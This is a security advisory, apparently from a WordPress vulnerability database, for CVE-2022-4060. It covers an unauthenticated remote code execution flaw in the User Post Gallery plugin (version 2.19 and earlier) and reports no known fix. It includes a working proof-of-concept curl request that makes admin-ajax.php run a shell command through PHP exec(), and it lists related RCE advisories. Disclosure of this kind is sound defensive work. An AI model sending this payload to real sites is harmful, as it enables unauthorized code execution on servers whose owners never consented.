User Post Gallery <= 2.19 – Unauthenticated RCE | CVE 2022-4060

Description

The plugin does not limit what callback functions can be called by users, making it possible to any visitors to run code on sites running it.

Proof of Concept

Invoke the following curl command to execute the "id" command via PHP's exec() function:

curl -i 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL'

Affects Plugins

wp-upg

No known fix

References

CVE

CVE-2022-4060

Classification

Type

RCE

OWASP top 10

A1: Injection

CWE

CWE-94

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

cyllective

Verified

Yes

WPVDB ID

8f982ebd-6fc5-452d-8280-42e027d01b1e

Timeline

Publicly Published

2022-12-23 (about 1 years ago)

Added

2022-12-23 (about 1 years ago)

Last Updated

2022-12-23 (about 1 years ago)

Other

Published

Title

Published

2016-06-09

Title

EWWW Image Optimizer <= 2.8.3 - Remote Code Execution

Published

2014-08-01

Title

PHP Speedy <= 0.5.2 - (admin_container.php) Remote Code Exec Exploit

Published

2014-08-01

Title

WP-Super-Cache 1.3 - Remote Code Execution

Published

2015-05-06

Title

eShop <= 6.3.11 - Remote Code Execution

Published

2024-02-26

Title

Slivery Extender <= 1.0.2 - Authenticated(Contributor+) Remote Code Execution via shortcode